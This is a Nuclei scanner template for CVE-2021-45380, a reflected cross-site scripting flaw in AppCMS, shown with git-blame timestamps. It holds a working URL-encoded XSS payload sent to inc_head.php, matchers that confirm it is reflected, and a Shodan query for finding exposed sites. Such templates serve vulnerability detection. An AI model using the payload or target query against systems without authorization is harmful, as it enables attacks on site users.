nuclei-templates/http/cves/2021/CVE-2021-45380.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2022-01-27 18:40:43 +00:00
id: CVE-2021-45380
info:
name: AppCMS - Cross-Site Scripting
2022-01-27 18:40:43 +00:00
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2022-01-28 05:29:21 +00:00
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-45380
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.02148
epss-percentile: 0.87858
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*
2022-07-06 19:06:43 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: appcms
product: appcms
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"Powerd by AppCMS"
tags: cve,cve2021,appcms,xss
2022-01-27 18:40:43 +00:00
http:
2022-01-27 18:40:43 +00:00
- method: GET
path:
2022-01-28 05:29:21 +00:00
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-01-27 18:40:43 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-01-28 05:29:21 +00:00
words:
- '""></script><script>alert(document.domain)</script>'
2022-01-27 18:40:43 +00:00
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200